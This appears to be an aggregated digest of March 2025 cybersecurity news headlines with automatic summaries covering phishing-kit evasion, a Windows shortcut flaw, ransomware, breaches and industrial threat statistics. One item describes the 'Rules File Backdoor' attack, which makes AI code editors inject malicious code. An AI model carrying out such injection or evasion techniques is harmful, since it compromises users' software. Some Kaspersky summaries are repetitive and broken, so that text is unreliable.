    While phishing has evolved, email security hasn't kept up. Attackers now bypass MFA & detection tools with advanced phishing kits, making credential theft harder to prevent. Learn how Push Security's browser-based security stops attacks as they happen. [...] "

    Autosummary: Comparing a legitimate page’s DOM structure with an attacker’s cloned page (Source: Push Security)
    They’re also randomizing page titles, dynamically decoding text, changing the size and name of image elements, using different favicons, blurring backgrounds, substituting logos, and more… all to defeat common detections. For example, recent Adversary-in-the-Middle phishing kits including Tycoon, Nakedpages and Evilginx were seen to rotate the URLs they resolve to (from a continually refreshed pool of URLs), mask the HTTP Referer header to disguise suspicious redirects, and redirect to benign (legitimate) domains if anyone but the intended victims attempted to visit the page. If you’re using an email security solution, you’re relying on the following core capabilities when it comes to detecting malicious phishing pages: Known-bad blocklists: Block users from accessing known-bad or unapproved domains/URLs, and block traffic from known-bad malicious IPs, using Threat Intelligence (TI) feeds. This also applies to other solutions that rely on these capabilities, such as web-based content filtering (e.g. Google Safe Browsing), CASB, SASE, SWG, etc. However, because the attacker is sitting in the middle of this connection, they are able to observe all interactions and intercept authentication material like credentials, MFA codes, and session tokens to take control of the authenticated session and gain control of the user account. A better solution to the problem would therefore be able to follow the user across the sites they use, and see the actual phishing pages as the user sees them, as opposed to a sandbox (which, as we’ve discussed, attackers are well prepared for). "


    The “free money” trap: How scammers exploit financial anxiety

    financial exploits
    2025-03-19 https://www.malwarebytes.com/blog/scams/2025/03/the-free-money-trap-how-scammers-exploit-financial-anxiety
    With financial stress at an all-time high, people are desperately seeking relief. Sadly, scammers know this all too well. "

    Autosummary: IOCs: [list of IP addresses and domains omitted] Whether it’s a so-called “subsidy program,” a “government grant,” or a “relief card,” these scams all share the same underlying goal—to manipulate people into giving away their personal information, or—worse—their hard-earned cash. Common free money scams Too-good-to-be-true claims: “Get a $6,400 Subsidy to Pay for Groceries, Rent, and Gas!” "


    Sperm bank breach deposits data into hands of cybercriminals

    financial ciber
    2025-03-19 https://www.malwarebytes.com/blog/news/2025/03/sperm-bank-breach-deposits-data-into-hands-of-cybercriminals
    Sperm donor giant California Cryobank has announced it has suffered a data breach that exposed customers' personal information. "

    Autosummary: The Breach Notification Rule requires the provision of a notification to affected individuals, the Secretary of Health and Human Services, and, in certain circumstances, to the media, in the event of a breach of unsecured PHI. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. The handling, storage, and sharing of protected health information (PHI) within sperm banks falls under the Health Insurance Portability and Accountability Act (HIPAA): The Privacy Rule requires sperm banks to implement safeguards to protect the privacy of PHI and sets limits and conditions on the uses and disclosures that can be made without patient consent. "


    Report: The State of Secrets Sprawl 2025

    government
    2025-03-19 https://www.helpnetsecurity.com/2025/03/19/report-the-state-of-secrets-sprawl-2025/

    GitGuardian’s State of Secrets Sprawl 2025 report shows no progress in combating secrets sprawl, with 23.8 million secrets leaked on public GitHub repositories in 2024—a 25% year-over-year increase. Despite GitHub Push Protection’s efforts, secrets sprawl is accelerating, especially with generic secrets, which made up 58% of all leaked credentials. More troubling, 70% of secrets leaked in 2022 remain active, significantly expanding the attack surface for threat actors. The report makes one thing clear: secrets management … More "

    Autosummary: "


    APTs have been using zero-day Windows shortcut exploit for eight years (ZDI-CAN-25373)

    exploits
    2025-03-19 https://www.helpnetsecurity.com/2025/03/19/apts-zero-day-windows-shortcut-vulnerability-exploit-zdi-can-25373/

    State-sponsored threat actors and cybercrime groups from North Korea, Iran, Russia, and China have been exploiting a zero-day Windows vulnerability with no fix in sight for the last eight years, researchers with Trend Micro’s Zero Day Initiative have warned on Tuesday. The vulnerability, which doesn’t have a CVE number but is being tracked as ZDI-CAN-25373 by ZDI researchers, allowed attackers to surreptitiously execute malicious commands on a victim’s machine and deliver a variety of malware … More "

    Autosummary: Unfortunately, users are unable to spot anything suspicious, as the Target field is padded with whitespace or other characters so that Windows will not be able to show the malicious arguments within the allotted space in the user interface. [Figure: The Target field seems empty because of whitespace padding (Source: Trend Micro)] “By exploiting ZDI-CAN-25373, the threat actor can prevent the end user from viewing critical information (commands being executed) related to evaluating the risk level of the file,” the researchers explained. "


    Leaked Black Basta Chats Suggest Russian Officials Aided Leader's Escape from Armenia

    rusia-ucrania
    2025-03-19 https://thehackernews.com/2025/03/leaked-black-basta-chats-suggest.html
    The recently leaked trove of internal chat logs among members of the Black Basta ransomware operation has revealed possible connections between the e-crime gang and Russian authorities. The leak, containing over 200,000 messages from September 2023 to September 2024, was published by a Telegram user @ExploitWhispers last month. According to an analysis of the messages by cybersecurity company "

    Autosummary: "


    Rules File Backdoor: AI Code Editors exploited for silent supply chain attacks

    exploits
    2025-03-19 https://securityaffairs.com/175593/hacking/rules-file-backdoor-ai-code-editors-silent-supply-chain-attacks.html
    The Rules File Backdoor attack targets AI code editors like GitHub Copilot and Cursor, making them inject malicious code via a supply chain vulnerability. Pillar Security researchers uncovered a dangerous new supply chain attack vector called ‘Rules File Backdoor.’ Threat actors could use the technique to silently compromise AI-generated code by injecting malicious code. The attack […] "

    Autosummary: Initial responsible disclosure to Cursor. February 27, 2025: Cursor replied that they are investigating the issue. March 6, 2025: Cursor replied and determined that this risk falls under the users’ responsibility. March 7, 2025: "


    Colombian police arrest Italian fugitive accused of being mafia boss

    latam
    2025-03-19 https://www.bbc.com/news/articles/cr72xrr9vrno
    Police have described Emanuele Gregorini as "the head of the Italian mafia Latin America". "

    Autosummary: "


    Microsoft fixes Windows update bug that uninstalled Copilot

    exploits
    2025-03-19 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-update-bug-that-wiped-out-copilot/
    Microsoft has fixed a bug causing the March 2025 Windows cumulative updates to mistakenly uninstall the AI-powered Copilot digital assistant from some Windows 10 and Windows 11 systems. [...] "

    Autosummary: "


    Click Profit blocked by the FTC over alleged e-commerce scams

    financial
    2025-03-19 https://www.bleepingcomputer.com/news/legal/click-profit-blocked-by-the-ftc-over-alleged-e-commerce-scams/
    The US Federal Trade Commission (FTC) has taken action against the "Click Profit" business opportunity platform for allegedly earning $14 million while deceiving consumers with false promises of guaranteed passive income through online stores. [...] "

    Autosummary: "The complaint highlights actual statistics on Click Profit's stores, which are mainly on Amazon, showing that after Amazon's fees, more than one-fifth of the company's stores on the platform earn no money at all and another third earns less than $2,500 in gross lifetime sales," reads FTC's announcement. "


    WhatsApp patched zero-click flaw exploited in Paragon spyware attacks

    exploits
    2025-03-19 https://www.bleepingcomputer.com/news/security/whatsapp-patched-zero-day-flaw-used-in-paragon-spyware-attacks/
    WhatsApp has patched a zero-click, zero-day vulnerability used to install Paragon's Graphite spyware following reports from security researchers at the University of Toronto's Citizen Lab. [...] "

    Autosummary: "The infrastructure we found is linked to webpages entitled "Paragon" returned by IP addresses in Israel (where Paragon is based), as well as a TLS certificate containing the organization name "Graphite," which is the name of Paragon's spyware, and the common name "installerserver" (Pegasus, a competitor spyware product, uses the term "Installation Server" to refer to a server designed to infect a device with spyware). "


    Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners

    exploits
    2025-03-19 https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html
    Threat actors are exploiting a severe security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) like Quasar RAT. The vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code. Cybersecurity company "

    Autosummary: Cybersecurity company Bitdefender said it has observed a surge in exploitation attempts against CVE-2024-4577 since late last year, with a significant concentration reported in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), and India (0.33%). "


    California Cryobank, the largest US sperm bank, disclosed a data breach

    financial
    2025-03-19 https://securityaffairs.com/175602/breaking-news/california-cryobank-the-largest-us-sperm-bank-disclosed-a-data-breach.html
    California Cryobank, the largest US sperm bank, suffered a data breach exposing customer information. California Cryobank (CCB) is the largest sperm bank in the U.S., providing frozen donor sperm and reproductive services, including egg and embryo storage. It operates in all 50 states and over 30 countries worldwide, helping individuals and couples with fertility treatments. […] "

    Autosummary: Pierluigi Paganini, March 19, 2025. California Cryobank, the largest US sperm bank, suffered a data breach exposing customer information. "


    Pennsylvania education union data breach hit 500,000 people

    financial
    2025-03-19 https://www.bleepingcomputer.com/news/security/pennsylvania-education-union-data-breach-hit-500-000-people/
    The Pennsylvania State Education Association (PSEA), the largest public-sector union in Pennsylvania, is notifying over half a million individuals that attackers stole their personal information in a July 2024 security breach. [...] "

    Autosummary: PSEA says the stolen information varies by individual and consists of personal, financial, and health data, including driver's license or state IDs, social security numbers, account PINs, security codes, payment card information, passport information, taxpayer ID numbers, credentials, health insurance and medical information. "


    Ukrainian military targeted in new Signal spear-phishing attacks

    financial
    2025-03-19 https://www.bleepingcomputer.com/news/security/ukrainian-military-targeted-in-new-signal-spear-phishing-attacks/
    Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces. [...] "

    Autosummary: "


    Malware campaign "DollyWay" breached 20,000 WordPress sites

    exploits
    2025-03-19 https://www.bleepingcomputer.com/news/security/malware-campaign-dollyway-breached-20-000-wordpress-sites/
    A malware operation dubbed "DollyWay" has been underway since 2016, compromising over 20,000 WordPress sites globally to redirect users to malicious sites. [...] "

    Autosummary: "While previously thought to be separate campaigns, our research reveals these attacks share common infrastructure, code patterns, and monetization methods - all appearing to be connected to a single, sophisticated threat actor. "


    Kali Linux 2025.1a released with 1 new tool, annual theme refresh

    Linux
    2025-03-19 https://www.bleepingcomputer.com/news/security/kali-linux-20251a-released-with-1-new-tool-annual-theme-refresh/
    Kali Linux has released version 2025.1a, the first version of 2025, with one new tool, desktop changes, and a theme refresh. [...] "

    Autosummary: Unfortunately, the team said this release is mostly focused on updates, so only one tool was included this time: hoaxshell - Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell In addition to Hoaxshell, Kali says they upgraded the Kernel version to 6.12. "


    How financial institutions can minimize their attack surface

    financial
    2025-03-18 https://www.helpnetsecurity.com/2025/03/18/sunil-mallik-discover-financial-institutions-security/

    In this Help Net Security interview, Sunil Mallik, CISO of Discover Financial Services, discusses cybersecurity threats for financial institutions. He also shares insights on balancing compliance with agility, lessons from regulatory audits, and Discover’s approach to risk management and workforce development. What are the most pressing security threats facing credit card and digital banking platforms, and how should organizations adapt defenses to counter them? The most pressing security threats facing credit card companies and digital … More "

    Autosummary: For example, I’m involved with the National Cybersecurity Alliance, American Transaction Processors Coalition and Financial Services Information Sharing and Analysis Center (FS-ISAC), which helps me stay connected with industry standards and best practices, ensuring we remain agile and compliant. Proactive measures, such as threat hunting, regular vulnerability assessments, and security awareness training, help prevent attacks before they occur. To counter these threats, financial services organizations should implement advanced threat detection systems, conduct regular security assessments, and educate customers about potential scams. "


    Cybersecurity jobs available right now: March 18, 2025

    ciber
    2025-03-18 https://www.helpnetsecurity.com/2025/03/18/cybersecurity-jobs-available-right-now-march-18-2025/

    Application Security Expert monday.com | United Kingdom | Hybrid – View job details As an Application Security Expert, you will provide guidance on security best practices and compliance, and undertake security testing. Develop security testing plans and integrate them into the software development lifecycle. Perform and oversee security testing and manage remediation of identified vulnerabilities. Application Security Analyst II, Information Security First National Financial | Canada | On-site – View job details As an Application … More "

    Autosummary: Manager, Cybersecurity with Data security, Security AI, DLP NielsenIQ | India | On-site – View job details As a Manager, Cybersecurity with Data security, Security AI, DLP, you will lead the design, implementation, and management of data security solutions, including but not limited to DLP, CASB, database security, and DSPM. Application Security Analyst II, Information Security First National Financial | Canada | On-site – View job details As an Application Security Analyst II, Information Security, you will analyze and document processes, policies, controls, and standards to ensure compliance with security frameworks and regulations. Cyber Security Engineer METEOR | Malaysia | On-site – View job details As a Cyber Security Engineer, you will be responsible for application security, cybersecurity, network security, information security, and vulnerability assessment. Cryptographic Key Operations Lead, Vice President State Street | Ireland | On-site – View job details As a Cryptographic Key Operations Lead, Vice President, oversee the daily operations and security of cryptographic key management, ensuring compliance with financial industry regulations. "


    Mandatory Coinbase wallet migration? It’s a phishing scam!

    financial
    2025-03-18 https://www.bitdefender.com/en-us/blog/hotforsecurity/mandatory-coinbase-wallet-migration-its-a-phishing-scam
    An ingenious phishing scam is targeting cryptocurrency investors, by posing as a mandatory wallet migration. Read more in my article on the Hot for Security blog. "

    Autosummary: Ingeniously, the intent of the email is not to steal the user's recovery seed (and thus gain access to their Coinbase wallet) but rather trick the user into setting up and transferring their funds into a new wallet, for which the scammer already knows the recovery phrase. "


    FBI: Free file converter sites and tools deliver malware

    exploits
    2025-03-18 https://www.helpnetsecurity.com/2025/03/18/fbi-free-file-converter-sites-and-tools-deliver-malware/

    Malware peddlers are increasingly targeting users who are searching for free file converter services (websites) and tools, the FBI’s Denver Field Office has warned earlier this month. “To conduct this scheme, cyber criminals across the globe are using any type of free document converter or downloader tool. This might be a website claiming to convert one type of file to another, such as a .doc file to a .pdf file. It might also claim to … More "

    Autosummary: He also provided a list of domains hosting sites that ostensibly provide file conversion services or tools, but actually engage in phishing and delivering trojans, adware and “riskware” – a category that encompasses programs that are not strictly malicious, but pose some sort of risk for the user (e.g., programs that can be used as a backdoor for other malware, may be illegal, or may violate the terms of service of other software or a user platform): Imageconvertors[.]com (Phishing), Convertitoremp3[.]it (Riskware), Convertisseurs-pdf[.]com (Riskware), Convertscloud[.]com "


    New Ad Fraud Campaign Exploits 331 Apps with 60M+ Downloads for Phishing and Intrusive Ads

    financial exploits
    2025-03-18 https://thehackernews.com/2025/03/new-ad-fraud-campaign-exploits-331-apps.html
    Cybersecurity researchers have warned about a large-scale ad fraud campaign that has leveraged hundreds of malicious apps published on the Google Play Store to serve full-screen ads and conduct phishing attacks. "The apps display out-of-context ads and even try to persuade victims to give away credentials and credit card information in phishing attacks," Bitdefender said in a report shared with "

    Autosummary: "The investigated applications bypass Android security restrictions to start activities even if they are not running in the foreground and, without required permissions to do so, spam the users with continuous, full-screen ads," the company added. "


    New Windows zero-day exploited by 11 state hacking groups since 2017

    exploits government
    2025-03-18 https://www.bleepingcomputer.com/news/security/new-windows-zero-day-exploited-by-11-state-hacking-groups-since-2017/
    At least 11 state-backed hacking groups from North Korea, Iran, Russia, and China have been exploiting a new Windows vulnerability in data theft and cyber espionage zero-day attacks since 2017. [...] "

    Autosummary: As the researchers found while investigating in-the-wild ZDI-CAN-25373 exploitation, the security flaw has been exploited in widespread attacks by many state-sponsored threat groups and cybercrime gangs, including Evil Corp, APT43 (Kimsuky), Bitter, APT37, Mustang Panda, SideWinder, RedHotel, Konni, and others. "


    Critical AMI MegaRAC bug can let attackers hijack, brick servers

    exploits
    2025-03-18 https://www.bleepingcomputer.com/news/security/critical-ami-megarac-bug-can-let-attackers-hijack-brick-servers/
    A new critical severity vulnerability found in American Megatrends International's MegaRAC Baseboard Management Controller (BMC) software can let attackers hijack and potentially brick vulnerable servers. [...] "

    Autosummary: [Figure: Exposed AMI MegaRAC instances (Eclypsium)] As part of their research into MegaRAC vulnerabilities (collectively tracked as BMC&C), Eclypsium analysts disclosed five more flaws in December 2022 and January 2023 (CVE-2022-40259, CVE-2022-40242, CVE-2022-2827, CVE-2022-26872, and CVE-2022-40258) that can be exploited to hijack, brick, or remotely infect compromised servers with malware. "


    Unpatched Windows Zero-Day Flaw Exploited by 11 State-Sponsored Threat Groups Since 2017

    exploits government
    2025-03-18 https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html
    An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017. The zero-day vulnerability, tracked by Trend Micro's Zero Day Initiative (ZDI) as ZDI-CAN-25373, refers to an issue that allows bad actors to execute hidden "

    Autosummary: Telemetry data indicates that governments, private entities, financial organizations, think tanks, telecommunication service providers, and military/defense agencies located in the United States, Canada, Russia, South Korea, Vietnam, and Brazil have become the primary targets of attacks exploiting the vulnerability. "


    New Critical AMI BMC Vulnerability Enables Remote Server Takeover and Bricking

    exploits
    2025-03-18 https://thehackernews.com/2025/03/new-critical-ami-bmc-vulnerability.html
    A critical security vulnerability has been disclosed in AMI's MegaRAC Baseboard Management Controller (BMC) software that could allow an attacker to bypass authentication and carry out post-exploitation actions. The vulnerability, tracked as CVE-2024-54085, carries a CVSS v4 score of 10.0, indicating maximum severity. "A local or remote attacker can exploit the vulnerability by accessing the "

    Autosummary: "


    ChatGPT SSRF bug quickly becomes a favorite attack vector

    exploits
    2025-03-18 https://securityaffairs.com/175560/hacking/chatgpt-ssrf-bug-quickly-becomes-a-favorite-attack-vector.html
    Threat actors exploit a server-side request forgery (SSRF) flaw, tracked as CVE-2024-27564, in ChatGPT, to target US financial and government organizations. Cybersecurity firm Veriti reports that threat actors are exploiting a server-side request forgery (SSRF) vulnerability, tracked as CVE-2024-27564 (CVSS score of 6.5), in ChatGPT to target financial and government organizations in the US. The […] "

    Autosummary: Pierluigi Paganini, March 18, 2025. Threat actors exploit a server-side request forgery (SSRF) flaw, tracked as CVE-2024-27564, in ChatGPT, to target US financial and government organizations. "


    Western Alliance Bank notifies 21,899 customers of data breach

    financial
    2025-03-18 https://www.bleepingcomputer.com/news/security/western-alliance-bank-notifies-21-899-customers-of-data-breach/
    Arizona-based Western Alliance Bank is notifying nearly 22,000 customers their personal information was stolen in October after a third-party vendor's secure file transfer software was breached. [...] "

    Autosummary: An analysis of the stolen files concluded on February 21, 2025, and found they contained customer personal information, including your name and Social Security number, as well as their dates of birth, financial account numbers, driver's license numbers, tax identification numbers, and/or passport information if it was provided to Western Alliance. "


    Nation-state actors and cybercrime gangs abuse malicious .lnk files for espionage and data theft

    government
    2025-03-18 https://securityaffairs.com/175569/apt/nation-state-actors-and-cybercrime-gangs-abuse-malicious-lnk-files-for-espionage-and-data-theft.html
    11 state-sponsored APTs exploit malicious .lnk files for espionage and data theft, with ZDI uncovering 1,000 such files used in attacks. At least 11 state-sponsored threat groups have been abusing Windows shortcut files for espionage and data theft, according to an analysis by Trend Micro’s Zero Day Initiative (ZDI). Trend ZDI researchers discovered 1,000 malicious […] "

    Autosummary: The attacks carried out by the threat actors aimed at organizations across the government, financial, telecommunications, military, and energy sectors in North America, Europe, Asia, South America, and Australia. Since 2017, the vulnerability has been exploited by APT groups from North Korea, Iran, Russia, and China. "


    Sperm donation giant California Cryobank warns of a data breach

    financial
    2025-03-18 https://www.bleepingcomputer.com/news/security/sperm-donation-giant-california-cryobank-warns-of-a-data-breach/
    US sperm donor giant California Cryobank is warning customers it suffered a data breach that exposed customers' personal information. [...] "

    Autosummary: "


    Pay, fight, or stall? The dilemma of ransomware negotiations

    exploits ransomware
    2025-03-17 https://www.helpnetsecurity.com/2025/03/17/ransomware-negotiations-decision-dilemma-video/

    Ransomware negotiations are a high-stakes game where every decision matters. In this Help Net Security video, Kurtis Minder, CEO at GroupSense, takes us inside the world of ransomware negotiations. We learn how attackers communicate, the tough decisions victims face, and the mistakes that can make or break a response. He breaks down the key factors in deciding whether to engage with hackers, the legal and ethical considerations, and why preparation is everything. Learn why logging … More "

    Autosummary: "


    Review: Cybersecurity Tabletop Exercises

    ciber
    2025-03-17 https://www.helpnetsecurity.com/2025/03/17/review-cybersecurity-tabletop-exercises/

    Packed with real-world case studies and practical examples, Cybersecurity Tabletop Exercises offers insights into how organizations have successfully leveraged tabletop exercises to identify security gaps and enhance their incident response strategies. The authors explore a range of realistic scenarios, including phishing campaigns, ransomware attacks, and insider threats, demonstrating how these exercises can uncover vulnerabilities before an actual crisis occurs. It also highlights key lessons learned from exercises that didn’t go as planned, providing a well-rounded … More "

    Autosummary: Real-world examples The book uses a practical, step-by-step approach, guiding readers through every phase of a successful tabletop exercise, from initial planning and execution to follow-up evaluations. "


    Free file converter malware scam “rampant” claims FBI

    financial exploits
    2025-03-17 https://www.bitdefender.com/en-us/blog/hotforsecurity/free-file-converter-malware-scam-rampant-claims-fbi
    Whether you're downloading a video from YouTube or converting a Word document into a PDF file, there's a chance that you might be unwittingly handing control of your PC straight into the hands of cybercriminals. Read more in my article on the Hot for Security blog. "

    Autosummary: "


    Borked Chromecasts are beginning to receive their update – just hope you didn’t do a factory reset

    industry
    2025-03-17 https://www.bitdefender.com/en-us/blog/hotforsecurity/borked-chromecasts-are-beginning-to-receive-their-update-just-hope-you-didnt-do-a-factory-reset
    The news can't have come too soon for the many Chromecast users who have found themselves unable to stream their favourite TV shows, movies, and other media. Read more in my article on the Hot for Security blog. "

    Autosummary: "


    Researcher releases free GPU-Based decryptor for Linux Akira ransomware

    exploits ransomware Linux
    2025-03-17 https://securityaffairs.com/175494/cyber-crime/free-decryptor-linux-akira-ransomware-brute-force.html
    A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force. Security researcher Yohanes Nugroho created a free decryptor for Linux Akira ransomware, using GPUs to brute force the decryption keys. Initially estimating a week, the project took three weeks and cost $1,200 in GPU resources due […] "

    Autosummary: Pierluigi Paganini, March 17, 2025. A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force. The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "


    Threat landscape for industrial automation systems. Regions, Q4 2024

    industry
    2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q4-2024/
    The percentage of ICS computers on which malicious objects were blocked increased in eight regions. Regionally, the percentage ranged from 10.6% in Northern Europe to 31.0% in Africa. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. [Figure: Regions ranked by percentage of ICS computers on which spyware was blocked, Q4 2024] In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. [Figure: Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q4 2024] All regions ranked by percentage of ICS computers on which malicious objects were blocked in the fourth quarter can be divided into three groups. Over 25%: Africa – 31.0%, South-East Asia – 30.1%, Middle East – 25.7%. In the regions within this group, OT computers are generally overexposed to cyberthreats. However, in Q4 2024, this category ranked higher than the corresponding global ranking (ninth place) in the following regions: South-East Asia – fifth place in the regional ranking; East Asia – seventh place in the regional ranking. The only three regions with growth in the percentage of ICS computers on which malware for AutoCAD was blocked were South-East Asia, South Asia, and Central Asia.
    Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources: In Q4 2024, East Asia ranked first again among the regions by percentage of ICS computers on which malicious threats from network folders were blocked, surpassing the global average by 3.4 times (exceeding Q3 2024 levels). Compared to the global average, the region has a higher percentage of ICS computers on which the following were blocked: Threat sources: In Q4 2024, Southern Europe again ranked first globally in the percentage of ICS computers where malicious threats from email clients were blocked, exceeding the global average by 2.4 times. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.3 times, ranked second globally in terms of growth. Compared to the global average, the region also has a significantly higher percentage of ICS computers on which the following were blocked: Threat sources: The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.9 times (surpassing Q3 2024 levels). Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.3 times, first in the world in terms of growth. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Web miners: by 1.3 times, third globally in terms of growth.
    [Figure: Changes in the percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q4 2024] Covert cryptomining programs, web miners running in browsers: The three leading regions by percentage of ICS computers on which web miners running in browsers were blocked were the Middle East, Africa, and Eastern Europe. [Figure: Changes in the percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024] Malicious documents: Southern Europe, Latin America, and the Middle East ranked as the top three regions by the percentage of ICS computers on which malicious documents were blocked. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. [Figure: Changes in the percentage of ICS computers on which denylisted internet resources were blocked, Q4 2024] Malicious scripts and phishing pages: The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and Latin America. Comparative analysis, threat categories: Compared to the global average, the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents: 2.2 times higher (surpassing Q3 2024 levels), ranked first by value among the regions.
    [Figure: Changes in the percentage of ICS computers on which malicious documents were blocked, Q4 2024] Next-stage malware: Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. [Figure: Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q4 2024] Denylisted internet resources: Africa, South-East Asia, and Central Asia ranked as the top three regions by the percentage of ICS computers on which denylisted internet resources were blocked. [Figure: Changes in the percentage of ICS computers on which spyware was blocked, Q4 2024] Covert cryptomining programs, miners in the form of executable files for Windows: In the fourth quarter of 2024, similar to the previous quarter, a significant portion of Windows miners found on ICS computers consisted of archives with names mimicking legitimate software. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Threat sources: The region ranked third in the world by percentage of ICS computers on which threats from email clients were blocked, exceeding the global average by 1.7 times. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.2 times. Quarterly changes and trends, threat categories: The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD: by 1.3 times. "
Comparative analysis Threat categories Compared to the global figures , the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents: 1.9 times higher, ranked second by value among the regions. , the region has a of ICS computers on which the following were blocked: Threat sources South Asia ranks third globally by percentage of ICS computers on which malicious threats from removable devices were blocked, surpassing the global average by 1.8 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in was in the percentage of ICS computers on which the following were blocked: Ransomware: by 1.3 times. Comparative analysis Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which miners in the form of executable files for Windows were blocked: 1.5 times higher (surpassing Q3 2024 levels), ranked second by value globally. Comparative analysis Threat categories Compared to the global figures , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.2 times higher (surpassing Q3 2024 levels). Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024 The top three regions in terms of growth in the percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and the Middle East. Changes in the percentage of ICS computers on which worms were blocked, Q4 2024 Viruses The top three regions by percentage of ICS computers on which viruses were blocked remained South-East Asia, Africa, and East Asia. 
, the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.3 times in Q4 2024. Changes in the percentage of ICS computers on which web miners were blocked, Q4 2024 Ransomware The top three regions with the highest percentage of ICS computers on which ransomware was blocked were the Middle East, Africa, and South Asia. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malware for AutoCAD: 3.8 times higher, ranked second by value globally. Comparative analysis Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows: 2.1 times higher, ranks first by value globally. "


    Threat landscape for industrial automation systems. Q4 2024

    industry
    2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q4-2024/
    The percentage of ICS computers on which malicious scripts and phishing pages as well as ransomware were blocked continued to increase. "

    Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries. The most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals.
    Q4 in numbers (parameter: Q3 2024 / Q4 2024 / quarterly change)
      Global percentage of attacked ICS computers: 22.0% / 21.9% / ▼0.1 pp
      Percentage of ICS computers on which malicious objects from different categories were blocked:
        Malicious scripts and phishing pages (JS and HTML): 6.24% / 7.11% / ▲0.87 pp
        Denylisted internet resources: 6.84% / 5.52% / ▼1.32 pp
        Spy Trojans, backdoors and keyloggers: 3.91% / 4.30% / ▲0.39 pp
      Main threat sources:
        Internet: 10.84% / 9.98% / ▼0.86 pp
        Email clients: 2.95% / 2.72% / ▼0.23 pp
        Removable media: 0.69% / 0.64% / ▼0.05 pp
        Network folders: 0.11% / 0.08% / ▼0.03 pp
    Statistics across all threats: In the fourth quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.1 pp from the previous quarter to 21.9%. Percentage of ICS computers on which malicious objects were blocked, Jan 2023-Dec 2024. Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 10.6% in Northern Europe to 31% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024. Compared to the fourth quarter of 2023, the percentage decreased by 2.5 pp.
    Percentage of ICS computers on which malicious objects were blocked in selected industries. Diversity of detected malicious objects: Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "


